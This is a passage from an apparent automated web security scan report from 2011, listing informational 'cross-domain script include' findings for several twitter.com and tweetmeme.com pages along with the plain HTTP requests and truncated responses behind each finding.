Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547" type="text/javascript"></script>
...[SNIP]...

21.476. http://twitter.com/nbc/primetime

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /nbc/primetime

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
  • http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
  • http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
  • http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
  • http://a2.twimg.com/a/1295646587/javascripts/lists.js?1295901448
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910418-13129-32425
ETag: "a5a44db8a71fab6b9f2580b61e51bac4"
Last-Modified: Mon, 24 Jan 2011 23:06:58 GMT
X-Runtime: 0.49830
Content-Type: text/html; charset=utf-8
Content-Length: 57012
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lists.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.477. http://twitter.com/netlingo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /netlingo

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883
  • http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883
  • http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883
  • http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883
  • http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883
  • http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883
  • http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964123-67769-3429
ETag: "8ed7c55c146db619fdf925948244e6a4"
Last-Modified: Tue, 25 Jan 2011 14:02:03 GMT
X-Runtime: 0.57870
Content-Type: text/html; charset=utf-8
Content-Length: 48756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883" type="text/javascript"></script>
...[SNIP]...

21.478. http://twitter.com/nickhalstead/status/15837113167

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /nickhalstead/status/15837113167

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
  • http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /nickhalstead/status/15837113167 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964112-46984-37079
ETag: "2a3e1a1864a58dc8b2d4201a204ff2c5"
Last-Modified: Tue, 25 Jan 2011 14:01:52 GMT
X-Runtime: 0.05636
Content-Type: text/html; charset=utf-8
Content-Length: 13650
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964110102891; path=/; expires=Tue, 01-Feb-11 14:01:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411225932495; path=/; expires=Thu, 24 Feb 2011 14:01:52 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMTk2NDYwNmQ5MTBjYjNlYWEzY2UzYzZiOGE3MDQ5%250ANmI6DnJldHVybl90byI3aHR0cDovL3R3aXR0ZXIuY29tL25pY2toYWxzdGVh%250AZC9zdGF0dXMvMTU4MzcxMTMxNjc6B2lkIiViZDVjNTFmMjJhOThkNmZmODRl%250AMDVlOTAyNGUyNzJhNyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCIUFe70t%250AAQ%253D%253D--67c44ee9e15f6c0fbae20d582963e29eb03333df; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.479. http://twitter.com/spies_assassins

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /spies_assassins

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547
  • http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9198-19132
ETag: "d25862c279dba6cd1e553cac20d22d67"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.81721
Content-Type: text/html; charset=utf-8
Content-Length: 53400
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295916547" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295916547" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295916547" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/api.js?1295916547" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295916547" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/dismissable.js?1295916547" type="text/javascript"></script>
...[SNIP]...

21.480. http://twitter.com/tweetmeme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /tweetmeme

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883
  • http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883
  • http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883
  • http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883
  • http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883
  • http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883
  • http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:06 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9478-51270
ETag: "7b585adb867e3eb6f32095f5c2866375"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.01836
Content-Type: text/html; charset=utf-8
Content-Length: 53983
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/twitter.js?1295915883" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915883" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915883" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/geov1.js?1295915883" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/api.js?1295915883" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915883" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/dismissable.js?1295915883" type="text/javascript"></script>
...[SNIP]...

21.481. http://twitter.com/typekit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /typekit

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
  • http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
  • http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292
  • http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964132-61803-46798
ETag: "2d1d82c342cf698a8f46318662e78b68"
Last-Modified: Tue, 25 Jan 2011 14:02:12 GMT
X-Runtime: 0.01489
Content-Type: text/html; charset=utf-8
Content-Length: 43545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292" type="text/javascript"></script>
...[SNIP]...

21.482. http://twitter.com/ups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ups

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475
  • http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475
  • http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475
  • http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475
  • http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475
  • http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475
  • http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964085-20547-5536
ETag: "85433ba8bcb16420f3ea185c5d7c6195"
Last-Modified: Tue, 25 Jan 2011 14:01:25 GMT
X-Runtime: 0.01379
Content-Type: text/html; charset=utf-8
Content-Length: 52371
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475" type="text/javascript"></script>
...[SNIP]...

21.483. http://ugg.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ugg.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: ugg.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:02:16 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=829c716c3f5e23f491631347aa8b9682; expires=Tue, 01-Feb-2011 14:02:16 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0046799182891846
X-Served-In: 1.2870261669159
X-Served-By: h03
Content-Length: 40013

